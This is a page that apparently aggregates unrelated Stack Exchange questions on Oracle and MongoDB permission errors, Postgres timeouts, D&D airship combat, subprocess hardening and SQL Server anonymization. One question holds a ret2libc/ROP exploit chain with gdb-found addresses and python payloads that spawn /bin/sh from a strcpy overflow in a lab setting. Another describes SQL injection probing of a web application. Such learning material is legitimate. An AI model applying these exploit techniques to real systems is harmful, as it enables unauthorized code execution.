ORACLE execute error: ORA-01950: no privileges on tablespace ‘PDATA’

I’m new in Oracle, so maybe my question could be stupid. I use Oracle only for data storage. I have made some research but I’m blocked. I use Oracle 12c. I created a PDB with admin user PEEI_SYS like this:

create pluggable database PEEI admin user PEEI_SYS identified by PEEI  roles = (DBA); -- open PDB PEEI  alter pluggable database PEEI open read write;` 

I have created another user called PEEI which should only do select, update, insert on tables owned by PEEI_SYS. I have created the user PEEI like this:

CREATE USER "PEEI" IDENTIFIED BY "PEEI" DEFAULT TABLESPACE PDATA TEMPORARY TABLESPACE TEMP PROFILE DEFAULT ACCOUNT UNLOCK;` Now I would like that the user PEEI could insert rows in the table PEEI_SYS.PEEI_P_TRACKING. This table is created like this:  `CREATE TABLE PEEI_SYS.PEEI_P_TRACKING (  "CODE_WORKFLOW" VARCHAR2(30 BYTE),  "STATUS" VARCHAR2(15 BYTE),  "DATE_UPDATE" DATE,  "USER_UPDATE" VARCHAR2(20 BYTE),  "DEB_WORKFLOW" DATE,  "FIN_WORKFLOW" DATE,  "TIME_SECOND" NUMBER ) PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 NOCOMPRESS LOGGING STORAGE(INITIAL 65536 NEXT 1048576 MINEXTENTS 1 MAXEXTENTS 2147483645 PCTINCREASE 0 FREELISTS 1 FREELIST GROUPS 1 BUFFER_POOL DEFAULT) TABLESPACE "PDATA" ; GRANT SELECT ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_READ; GRANT DELETE ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_WRITE; GRANT INSERT ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_WRITE; GRANT UPDATE ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_WRITE; 

When I got the error I granted unlimited privileges to PEEI user on PDATA tablespaces like this: ALTER USER PEEI QUOTA UNLIMITED ON PDATA; I have still the error. Could you please help me ? Thank you very much in advance. Kind regards, enter image description here

Not authorized on test to execute command

Here is my code:

mongoose.connect(consts.database, {     useNewUrlParser: true,     useUnifiedTopology: true,     sslCA: consts.databaseCert, }); //... const user = await db.userModel.findOne({     username: usernameLowerCase }).exec(); 

Here is my DB connection string (anonymized):

mongodb://myUser:userPW@SG-staging-111.servers.mongodirector.com:27017,SG-staging-43334.servers.mongodirector.com:27017?replicaSet=RS-staging-0&ssl=true&authSource=stagingDB 

I’m getting this error:

MongoError: not authorized on test to execute command {     find: "users",     filter: {         username: "bob"     },     projection: {},     limit: 1,     singleBatch: true,     batchSize: 1,     returnKey: false,     showRecordId: false,     lsid: {         id: UUID("0a9400e3-83e3-429c-b8c9-92ade2ff210e")     },     $  clusterTime: {         clusterTime: Timestamp(1613200171, 1),         signature: {             hash: BinData(0, FED473B580D13E7E5073756DB5140981AADB2985),             keyId: 6928615819992774977         }     },     $  db: "test" }  

DB user’s info:

myUser  [{"role":"readWrite","db":"stagingDB"}] 

I have no clue why I am getting this error not authorized on test to execute command, and in the return string $ db: "test" I don’t even have a database named test. What could I be doing wrong? I just recently added this new user myUser, but now I’m getting this error. Does this error mean that the user is not authorized to "test" commands? Or, does it mean that I am trying to (somehow) connect with a DB named "test"?

How do I create a query which takes certain time to execute?

I have configured statement_timeout=1000 in Postgres DB

I am accessing a DB table using a JDBC driver from a java application. JDBC driver will throw an exception if the statement times out. I have a logic that will get executed if the exception is thrown.

Now I want to test this functionality, is there a way to make a query not return the result within 1000 millsecs?

How should I set up and execute air battles in my session to avoid easy encounters?

I’m running the Storm King’s Thunder campaign, and we are at the portion where the PCs get an airship to travel around in, the airship is about 1000ft in the air. There are approximately 5-6 lvl 7 PCs, and they have 3 or 4 hard encounters a day. There are two wizards, a warlock, ranger, paladin, blood hunter, sorcerer, and fighter.

For the most part, they have had fun with the different weapons and enemies they have faced; however, I find that one or two spellcasting PCs have been using spells such as mind sliver, polymorph, and hypnotic pattern to defeat more challenging encounters, such as one with a roc and wyvern. They make the creature make saving throws with hypnotic pattern and cause the enemy to fall to its death, and using mind sliver makes it even harder, especially on low wisdom creatures like rocs. Or with the polymorph spell, they cause the enemy to become a fish or chicken and throw it off the edge, and since the damage carries over, it kills the monster. I realize it was legal and made fights funnier, but it does get annoying when it’s happening in almost every fight. Are there any suggestions on how to keep them on track without them making every encounter easy?

I thought of giving the monsters immunity to these effects, but it sounds like a lame excuse for me not being prepared.

How should I set up and execute air battles in my session to avoid easy encounters? [duplicate]

I’m running the Storm King’s Thunder campaign in dnd 5e, and we are at the portion where the PCs get an airship to travel around in. There are approximately 5-6 lvl 7 PCs, and they have 3 or 4 hard encounters a day. There are two wizards, a warlock, ranger, paladin, blood hunter, sorcerer, and fighter.

For the most part, they have had fun with the different weapons and enemies they have faced; however, I find that one or two spellcasting PCs have been using spells such as mind sliver, polymorph, and hypnotic pattern to defeat more challenging encounters, such as one with a roc and wyvern. They make the creature make saving throws with hypnotic pattern and cause the enemy to fall to its death, and using mind sliver makes it even harder, especially on low wisdom creatures like rocs. Or with the polymorph spell, they cause the enemy to become a fish or chicken and throw it off the edge, and since the damage carries over, it kills the monster. I realize it was legal and made fights funnier, but it does get annoying when it’s happening in almost every fight. Are there any suggestions on how to keep them on track without them making every encounter easy?

I thought of giving the monsters immunity to these effects, but it sounds like a lame excuse for me not being prepared.

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A vulnerable C program to stack buffer overflow, requires 112 byte stuffing to get to return address of the calling function. Here the Strcpy() is the vulnerable function.

void f(char *name){   char buf[100];   strcpy(buf, name); }  void main(int argc, char *argv[]){   f(argv[1]); }  

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

(gdb) print execl       $  1 =  0xb7eb7b60 <__GI_execl> (gdb) print exit       $  2 =  0xb7e359e0 <__GI_exit>  (gdb) info proc map  ...(output omitted) (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"       0xb7f62b0b       1 pattern found. (gdb) x/s 0xb7f62b0b       0xb7f62b0b:   "/bin/sh"  (gdb) run $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       process 3161 is executing new program: /bin/dash       /bin/sh: 0: Can't open UWVS��������       [Inferior 1 (process 3161) exited with code 0177] 

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief i added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

addr. exit() fake byte (NULL will be written here)   addr. /bin/sh addr. /bin/sh addr. pop\pop\pop\ret addr. execl() addr. where to write NULL byte addr. pop\ret addr. gets()        <-- ESP will be here when is time to return to caller             112 NOP 

from gdb i run the exploit, i type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb i used to take the stack layer:

(gdb) b 10     --> this is to stop after strcpy() in the .c code   Breakpoint 1 at 0x8048497: file main.c, line 10.  (gdb) run $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')    Starting program: /home/marco/rop/main $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')   Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10   (gdb) b *execl   Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.   (gdb) c   Continuing.    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31   31    execl.c: File o directory non esistente.   (gdb) x/x $  esp   0xbffff5ec:   0xb7ef334f   (gdb) x/x $  esp+4   0xbffff5f0:   0xb7f64a0b   (gdb) x/x $  esp+8   0xbffff5f4:   0xb7f64a0b   (gdb) x/4x $  esp+12   0xbffff5f8:   0x00    0x42    0x42    0x42   (gdb) x/s $  esp+12   0xbffff5f8:   "" 

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

"\xe0\x83\xe6\xb7" +   -> gets() "\x6e\xd0\xe2\xb7" +   -> pop/ret "\xf8\xf5\xff\xbf" +   -> address where to write NULL "\x80\x9a\xeb\xb7" +   -> execl() "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh   "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh "\x42\x42\x42\x42" +   -> fake address to be overwritten "\xd0\x79\xe3\xb7"     -> exit() 

SQL Injection Doesn’t Sanitize But Doesn’t Execute Commands

I am currently doing a pentesting on a web application and focusing more on SQL Injection. This company I am pentesting have a functionality in which we are allowed to buy things from the vendors/suppliers registered there. When a product is added to our cart and ‘Checkout’ button is clicked, the web application will then communicate to the backend to create a cart based on specified ‘cart_id’ and INSERT it to the database. I know this is the case since when I tried to resubmit the request to the server the following error is specified:

"SQLIntegrityConstraintViolationException: Duplicate entry 'RANDOM_ALPHANUMERIC_CART_ID' for key 'idx_cart_id'" 

I tried checking for SQL Injection by adding a single quote at the end of the ‘cart_id’ and HTTP 200 is returned along with server response of a new cart_id with the single quote included. Does this mean It is not sanitizing input? I tried inserting other SQL Commands, the server will still return 200 and the commands are being printed out on the server response but not being executed. Is this web app vulnerable to SQLi (blind?)? If not, Is it possible for me to achieve other vuln such as Stored XSS?

Thank you

Securely execute child process on embedded Linux


Background

I have an embedded Linux devices and need to invoke a subprocess. I try to avoid it but sometimes it’s the most practical thing to do, e.g. calling networking commands like ip, networkmanager or doing data processing using an proprietary program.

The simplest thing to do is to call system(3) but then these bad things can happen:

  • Neither program name or arguments are sanitized.
  • PATH is modified by an attacker causing the wrong program to be executed
  • Another environment variable such as `IFS is modified by the attacker
  • If the attacker has been able to gain access to the child program, he may see open files which were not closed
  • And he/she may be able to gain elevated privileges if root privileges were not dropped.

So I probably should not rely on system(3) but write my own fork+exec function; pass the full path to the binary to be executed; make any arguments to the child process hard-coded; sanitize the environment variable; close open files; and drop privileges.

I’ve read the advice given in TAOSSA and John Viegas Secure Programming Cookbook

My Question

  • Are these steps sufficient?
  • Can someone point to generic implementation of procedures for safely executing subprocesses in C and C++
  • Do I have to drop capabilities as well?
  • Should I consider running child processes in more isolation? If so, what options are available to me? seccomp filters? Namespace sandboxing?

SQL Server 2019 UPDATE Statement SET to function does not execute the function again for each row

Here is the scenario. I have a local SQL Server to which I have restored the live SQL Server databases. In order to be GDPR/CCPA compliant, I must anonymize the PII in the local server’s databases. I have a script to do this, and it has been working quite well when the local server is 2008 R2 or 2017. But I just installed 2019 and the same script puts the same value in every row of the table, rather than a different value for each row. It is as though the function is executed only once, then that value is used in the UPDATE statement. Perhaps it is some kind of optimization 2019 is doing? Here is a snippet of the script.

UPDATE Guest SET GuestFirstName=Utility.dbo.RANDWORD() WHERE GuestFirstName IS NOT NULL;

RANDWORD grabs a random word from a table containing approximately 100,000 English words.